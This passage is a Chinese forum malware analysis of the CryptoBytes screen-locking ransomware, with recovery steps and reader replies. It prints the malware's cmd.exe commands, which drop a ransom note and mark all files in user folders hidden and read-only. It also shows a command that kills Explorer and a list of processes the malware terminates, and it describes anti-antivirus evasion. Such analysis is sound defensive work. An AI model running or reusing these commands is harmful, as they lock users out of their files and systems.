cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
2 向C:\Users\Public\desktop桌面文件夹中写入勒索信,并且将当前目录及其子目录的所有文件和文件夹属性设置为隐藏和只读,最后将勒索信info-0v92.txt这个文件的隐藏属性去掉。
```
cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
3 向C:\Users<用户名>\Downloads下载文件夹中写入勒索信,并且将当前目录及其子目录的所有文件和文件夹属性设置为隐藏和只读,最后将勒索信info-0v92.txt这个文件的隐藏属性去掉。
```
cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
4 向C:\Users<用户名>\Documents文件夹中写入勒索信,并且将当前目录及其子目录的所有文件和文件夹属性设置为隐藏和只读,最后将勒索信info-0v92.txt这个文件的隐藏属性去掉。
```
cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
5 向C:\Users<用户名>\文件夹下写入勒索信,并且将当前目录及其子目录的所有文件和文件夹属性设置为隐藏和只读,最后将勒索信info-0v92.txt这个文件的隐藏属性去掉。
```
cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
**强制终止任务管理器,造成任务栏假死等现象。**
主要通过如下命令实现:
```
taskkill.exe /im Explorer.exe /f
```
**写入开机启动项:**
主要会将自身写入到主表是HKEY_CURRENT_USER的如下开机启动项中
关闭指定进程:
```
"telegram",
"discord",
"skype",
"zoom",
"msedge",
"chrome",
"opera",
"browser",
"firefox",
"javaw",
"steam",
"steamwebhelper",
"steamservice",
"EpicGamesLauncher"
```
该程序会主动关闭列表指定的进程
**锁屏界面信息生成:**
该函数主要生成锁屏界面中的ID和Current PC
ID的生成是由:'ID:10-A'+密钥文件内容+0E+密钥文件内容组成。
Current PC是读取了Environment.MachineName变量的值。
**系统按键监控:**
该函数会监控Ctrl + Alt和Alt + Tab 还有Win这几个键的按下事件,如果触发则会调用vmethod_8()函数的Start方法
**vmethod_8()函数:**
该函数会返回一个计时器,如果按下特定的系统按键就会触发,而结果则是重启一下勒索的主界面。
**密码校验:**
这里的密码校验都挂到了回车键的按下事件上,当回车键被按下时,若是命令行中存在debug参数,那么在密码输入文本框中输入123,程序则会结束。
正常的校验则会判断输入的密码是否等于'0c0v11'+密钥文件($unlocker_id.ux-cryptobytes)中的内容,如果一致则执行method_5()恢复函数,否则则会执行vmethod_4().Start()方法,开启计时器,并且打印"Ошибка! Введённый код не совпадает с ключом разблокировки."
**密钥文件产生:**
会判断密钥文件是否存在,如果不存在,则向C:\Users\admin\AppData\Local\Temp\目录下写入密钥文件$unlocker_id.ux-cryptobytes。
密钥的内容取当前系统时间,例如:16:34:28,去掉其中的':'号后的值就是密码,最后会将其写入到密钥文件中。并且勒索程序在启动时会检查,该文件是否存在,则不会重复写入。
**破解方法:**
1.系统暂未重启,可以正常进入锁机界面
直接看勒索界面的左下角显示的ID即可,然后拼接上0c0v11即可。比如这里的密码就是:0c0v11163744
2.系统中断,无法正常进入锁机界面
直接用PE进入到系统镜像中,直接进入C:\Users\admin\AppData\Local\Temp\将$unlocker_id.ux-cryptobytes密钥文件的内容读取出来,或者直接修改为自己的密码,然后拼接0c0v11到开头,即可实现破解。
# **5.病毒分析概览**
## **5.1 基本信息**
### **恶意文件**
**AppFile.exe:**大小 720.60 MiB,适用于 Windows 2000,32 位 I386 架构。该文件是一个恶意模块下载器。
**DocumentsKKFCAAKFBA.exe:** 大小 278.50 KiB,32 位 GUI 应用程序,用于后门控制。
**DocumentsKKFCAAKFBA.exe:** 大小 180.50 KiB,32 位 GUI 应用程序,负责锁定屏幕和显示勒索信息。
## **5.2 勒索软件行为概述**
**病毒家族:** CryptoBytes(来源于乌克兰)
**首次捕获时间:** 2023-09-05
**威胁类型:** 主要为勒索软件和锁机病毒。
**加密文件特征:** 没有特定的加密文件扩展名,勒索信文件名为info-0v92.txt。
**解密工具:** 目前无免费解密器,受害者通常通过 Telegram 联系黑客组织获取解密密钥。
**检测名称:** 被多个杀毒引擎检测到,如 Avast (Win32), ESET-NOD32 (A Variant Of MSIL/Filecoder.LU) 等。
## **5.3 感染机制**
**感染症状:** 系统无法进入,系统内部信息可能被回传,磁盘被锁定,所有正常文件被隐藏。
**感染方式:** 通常通过恶意电子邮件附件、恶意广告、漏洞利用和恶意链接传播。
## **5.4 技术特征**
**恶意模块下载:** AppFile.exe 作为一个NSIS安装器,执行下载并释放其他恶意模块。这些模块通常是 .Net 编写的,并通过内存加载和解密后执行。
**后门功能:** DocumentsKKFCAAKFBA.exe 使用 RC4 加密来保护两段 shellcode,并通过内存修改权限和执行流程加载后门。
**锁机功能:** lc.exe 文件执行一系列命令来隐藏文件、显示勒索信息、关闭任务管理器、写入系统启动项,和锁屏。它还会监控系统按键(如 Ctrl+Alt、Alt+Tab 和 Win 键)以重新激活勒索界面。
## **5.5 系统防护绕过**
**反杀软检测:** 检查系统是否运行某些安全软件(如 wrsa.exe, avastui.exe 等),通过延迟执行或切换执行方式(如使用 AutoIt3)来绕过检测。
**进程注入:** 通过加密和反混淆技术,注入和执行恶意 payload 来加载附加模块。
## **5.6 破解和恢复方法**
**正常锁机界面:** 查看锁机界面左下角显示的ID,拼接上前缀“0c0v11”可得到解锁密码。
**系统中断:** 使用PE工具访问系统镜像,读取或修改密钥文件 $unlocker_id.ux-cryptobytes,并加上“0c0v11”前缀以进行解锁。
## **5.7 攻击载体和目标**
**攻击载体:** 下载器和后门程序通过恶意链接和附件分发,主要针对 Windows 操作系统。
**目标系统:** 使用基于 Windows 2000 的老旧系统和运行特定应用的企业和个人用户。
## **5.8 安全建议**
- 避免下载和运行不明来源的文件,特别是破解工具。
- 定期更新系统和杀毒软件,增强防护能力。
- 配备应急响应工具,如PE工具,备份关键数据,以便在感染后迅速恢复系统。
通过对 CryptoBytes 勒索软件的深入分析,可以更好地理解其传播和操作模式,采取有效的防御和应急响应措施。
牛 佩服 ;
另外请教:若中此类玩意, 我 直接pe里 ,格式化C盘重装系统是否可以? qiusj88 发表于 2024-9-3 20:09
牛 佩服 ;
另外请教:若中此类玩意, 我 直接pe里 ,格式化C盘重装系统是否可以?
这个例子幸亏没有真正加密勒索文件,只是隐藏。否则病毒把每一个文件都同个特定算法都加密了,即使你重装系统也用不了原来文件了。 作为一个初学者,想请教,如果直接重装系统,针对这种病毒能解决问题嘛 感谢分享过程 这个也太牛了吧 感谢作者发布这种高质量的长文,谢谢! 收藏学习! 感谢分享,又学习了新技能 真棒!!!
感谢分享 qiusj88 发表于 2024-9-3 20:09
牛 佩服 ;
另外请教:若中此类玩意, 我 直接pe里 ,格式化C盘重装系统是否可以?
应该可以吧 只不过重装很麻烦